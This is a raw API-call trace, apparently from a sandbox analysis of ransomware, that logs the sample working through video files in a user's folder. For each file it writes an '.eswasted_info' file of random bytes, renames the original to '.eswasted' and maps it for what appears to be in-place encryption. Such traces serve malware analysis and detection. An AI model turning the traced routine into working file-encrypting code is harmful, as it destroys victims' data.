(lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\c8fjIb0QJshu\\FS896neRzol\\1kG5LJnLJhSFEtc.mp4") returned 123 [0080.615] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x300) returned 0x71ec18 [0080.615] lstrcpyW (in: lpString1=0x71ed0e, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0080.615] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1410048 [0080.615] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0080.616] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1410048 | out: pbBuffer=0x1410048) returned 1 [0080.616] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.616] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\c8fjIb0QJshu\\FS896neRzol\\1kG5LJnLJhSFEtc.mp4.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\txlpj xg_g\\1kmbg\\c8fjib0qjshu\\fs896nerzol\\1kg5ljnljhsfetc.mp4.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0080.617] WriteFile (in: hFile=0x130, lpBuffer=0x1410048*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x1410048*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0080.619] SetEndOfFile (hFile=0x130) returned 1 [0080.619] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.619] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1410048 | out: hHeap=0x6d0000) returned 1 [0080.619] lstrcpyW (in: lpString1=0x71ed0e, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0080.619] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\c8fjIb0QJshu\\FS896neRzol\\1kG5LJnLJhSFEtc.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\txlpj xg_g\\1kmbg\\c8fjib0qjshu\\fs896nerzol\\1kg5ljnljhsfetc.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\c8fjIb0QJshu\\FS896neRzol\\1kG5LJnLJhSFEtc.mp4.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\txlpj xg_g\\1kmbg\\c8fjib0qjshu\\fs896nerzol\\1kg5ljnljhsfetc.mp4.eswasted")) returned 1 [0080.620] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\c8fjIb0QJshu\\FS896neRzol\\1kG5LJnLJhSFEtc.mp4.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\txlpj xg_g\\1kmbg\\c8fjib0qjshu\\fs896nerzol\\1kg5ljnljhsfetc.mp4.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0080.620] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0080.623] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0080.623] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0080.623] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.624] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0080.624] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0080.624] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.633] SetEndOfFile (hFile=0x130) returned 1 [0080.635] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1410048 | out: hHeap=0x6d0000) returned 1 [0080.635] CloseHandle (hObject=0x130) returned 1 [0080.641] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71ec18 | out: hHeap=0x6d0000) returned 1 [0080.642] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0080.642] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0080.642] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.642] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\c8fjIb0QJshu\\FS896neRzol\\AA9ZZAOYsRO\\0a9a.avi") returned 124 [0080.643] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x302) returned 0x71ec18 [0080.643] lstrcpyW (in: lpString1=0x71ed10, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0080.643] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1410048 [0080.643] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0080.643] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1410048 | out: pbBuffer=0x1410048) returned 1 [0080.643] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.643] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\c8fjIb0QJshu\\FS896neRzol\\AA9ZZAOYsRO\\0a9a.avi.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\txlpj xg_g\\1kmbg\\c8fjib0qjshu\\fs896nerzol\\aa9zzaoysro\\0a9a.avi.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0080.687] WriteFile (in: hFile=0x130, lpBuffer=0x1410048*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x1410048*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0080.689] SetEndOfFile (hFile=0x130) returned 1 [0080.689] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.689] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1410048 | out: hHeap=0x6d0000) returned 1 [0080.689] lstrcpyW (in: lpString1=0x71ed10, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0080.689] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\c8fjIb0QJshu\\FS896neRzol\\AA9ZZAOYsRO\\0a9a.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\txlpj xg_g\\1kmbg\\c8fjib0qjshu\\fs896nerzol\\aa9zzaoysro\\0a9a.avi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\c8fjIb0QJshu\\FS896neRzol\\AA9ZZAOYsRO\\0a9a.avi.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\txlpj xg_g\\1kmbg\\c8fjib0qjshu\\fs896nerzol\\aa9zzaoysro\\0a9a.avi.eswasted")) returned 1 [0080.690] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\c8fjIb0QJshu\\FS896neRzol\\AA9ZZAOYsRO\\0a9a.avi.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\txlpj xg_g\\1kmbg\\c8fjib0qjshu\\fs896nerzol\\aa9zzaoysro\\0a9a.avi.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0080.690] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0080.693] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0080.694] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0080.694] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.694] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0080.695] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0080.695] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.704] SetEndOfFile (hFile=0x130) returned 1 [0080.706] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1410048 | out: hHeap=0x6d0000) returned 1 [0080.706] CloseHandle (hObject=0x130) returned 1 [0080.708] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71ec18 | out: hHeap=0x6d0000) returned 1 [0080.708] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0080.709] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0080.709] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.709] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\c8fjIb0QJshu\\FS896neRzol\\AA9ZZAOYsRO\\fn6HeGaz8.mp4") returned 129 [0080.709] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x30c) returned 0x71ec18 [0080.709] lstrcpyW (in: lpString1=0x71ed1a, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0080.709] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1410048 [0080.709] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0080.710] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1410048 | out: pbBuffer=0x1410048) returned 1 [0080.710] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.710] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\c8fjIb0QJshu\\FS896neRzol\\AA9ZZAOYsRO\\fn6HeGaz8.mp4.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\txlpj xg_g\\1kmbg\\c8fjib0qjshu\\fs896nerzol\\aa9zzaoysro\\fn6hegaz8.mp4.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0080.711] WriteFile (in: hFile=0x130, lpBuffer=0x1410048*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x1410048*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0080.712] SetEndOfFile (hFile=0x130) returned 1 [0080.712] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.712] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1410048 | out: hHeap=0x6d0000) returned 1 [0080.712] lstrcpyW (in: lpString1=0x71ed1a, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0080.712] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\c8fjIb0QJshu\\FS896neRzol\\AA9ZZAOYsRO\\fn6HeGaz8.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\txlpj xg_g\\1kmbg\\c8fjib0qjshu\\fs896nerzol\\aa9zzaoysro\\fn6hegaz8.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\c8fjIb0QJshu\\FS896neRzol\\AA9ZZAOYsRO\\fn6HeGaz8.mp4.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\txlpj xg_g\\1kmbg\\c8fjib0qjshu\\fs896nerzol\\aa9zzaoysro\\fn6hegaz8.mp4.eswasted")) returned 1 [0080.713] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\c8fjIb0QJshu\\FS896neRzol\\AA9ZZAOYsRO\\fn6HeGaz8.mp4.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\txlpj xg_g\\1kmbg\\c8fjib0qjshu\\fs896nerzol\\aa9zzaoysro\\fn6hegaz8.mp4.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0080.713] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0080.716] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0080.716] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0080.716] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.717] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0080.717] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0080.717] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.725] SetEndOfFile (hFile=0x130) returned 1 [0080.728] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1410048 | out: hHeap=0x6d0000) returned 1 [0080.728] CloseHandle (hObject=0x130) returned 1 [0080.729] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71ec18 | out: hHeap=0x6d0000) returned 1 [0080.729] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0080.730] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0080.730] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.730] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\c8fjIb0QJshu\\FS896neRzol\\AA9ZZAOYsRO\\m4AW1IxZqmAXlA.swf") returned 134 [0080.730] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x316) returned 0x71ec18 [0080.730] lstrcpyW (in: lpString1=0x71ed24, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0080.730] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1410048 [0080.730] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0080.731] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1410048 | out: pbBuffer=0x1410048) returned 1 [0080.731] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.731] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\c8fjIb0QJshu\\FS896neRzol\\AA9ZZAOYsRO\\m4AW1IxZqmAXlA.swf.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\txlpj xg_g\\1kmbg\\c8fjib0qjshu\\fs896nerzol\\aa9zzaoysro\\m4aw1ixzqmaxla.swf.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0080.732] WriteFile (in: hFile=0x130, lpBuffer=0x1410048*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x1410048*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0080.733] SetEndOfFile (hFile=0x130) returned 1 [0080.733] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.733] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1410048 | out: hHeap=0x6d0000) returned 1 [0080.733] lstrcpyW (in: lpString1=0x71ed24, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0080.733] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\c8fjIb0QJshu\\FS896neRzol\\AA9ZZAOYsRO\\m4AW1IxZqmAXlA.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\txlpj xg_g\\1kmbg\\c8fjib0qjshu\\fs896nerzol\\aa9zzaoysro\\m4aw1ixzqmaxla.swf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\c8fjIb0QJshu\\FS896neRzol\\AA9ZZAOYsRO\\m4AW1IxZqmAXlA.swf.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\txlpj xg_g\\1kmbg\\c8fjib0qjshu\\fs896nerzol\\aa9zzaoysro\\m4aw1ixzqmaxla.swf.eswasted")) returned 1 [0080.779] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\c8fjIb0QJshu\\FS896neRzol\\AA9ZZAOYsRO\\m4AW1IxZqmAXlA.swf.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\txlpj xg_g\\1kmbg\\c8fjib0qjshu\\fs896nerzol\\aa9zzaoysro\\m4aw1ixzqmaxla.swf.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0080.779] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0080.782] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0080.782] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0080.783] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.783] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0080.783] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0080.783] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.792] SetEndOfFile (hFile=0x130) returned 1 [0080.794] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1410048 | out: hHeap=0x6d0000) returned 1 [0080.794] CloseHandle (hObject=0x130) returned 1 [0080.795] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71ec18 | out: hHeap=0x6d0000) returned 1 [0080.795] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0080.796] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0080.796] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.796] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\c8fjIb0QJshu\\FS896neRzol\\AA9ZZAOYsRO\\V_c 0OhekBSCrdUM.avi") returned 137 [0080.796] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x31c) returned 0x71ec18 [0080.796] lstrcpyW (in: lpString1=0x71ed2a, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0080.796] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1410048 [0080.796] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0080.797] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1410048 | out: pbBuffer=0x1410048) returned 1 [0080.797] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.797] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\c8fjIb0QJshu\\FS896neRzol\\AA9ZZAOYsRO\\V_c 0OhekBSCrdUM.avi.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\txlpj xg_g\\1kmbg\\c8fjib0qjshu\\fs896nerzol\\aa9zzaoysro\\v_c 0ohekbscrdum.avi.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0080.798] WriteFile (in: hFile=0x130, lpBuffer=0x1410048*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x1410048*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0080.799] SetEndOfFile (hFile=0x130) returned 1 [0080.799] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.799] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1410048 | out: hHeap=0x6d0000) returned 1 [0080.799] lstrcpyW (in: lpString1=0x71ed2a, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0080.799] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\c8fjIb0QJshu\\FS896neRzol\\AA9ZZAOYsRO\\V_c 0OhekBSCrdUM.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\txlpj xg_g\\1kmbg\\c8fjib0qjshu\\fs896nerzol\\aa9zzaoysro\\v_c 0ohekbscrdum.avi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\c8fjIb0QJshu\\FS896neRzol\\AA9ZZAOYsRO\\V_c 0OhekBSCrdUM.avi.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\txlpj xg_g\\1kmbg\\c8fjib0qjshu\\fs896nerzol\\aa9zzaoysro\\v_c 0ohekbscrdum.avi.eswasted")) returned 1 [0080.800] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\c8fjIb0QJshu\\FS896neRzol\\AA9ZZAOYsRO\\V_c 0OhekBSCrdUM.avi.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\txlpj xg_g\\1kmbg\\c8fjib0qjshu\\fs896nerzol\\aa9zzaoysro\\v_c 0ohekbscrdum.avi.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0080.800] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0080.801] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0080.802] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0080.802] 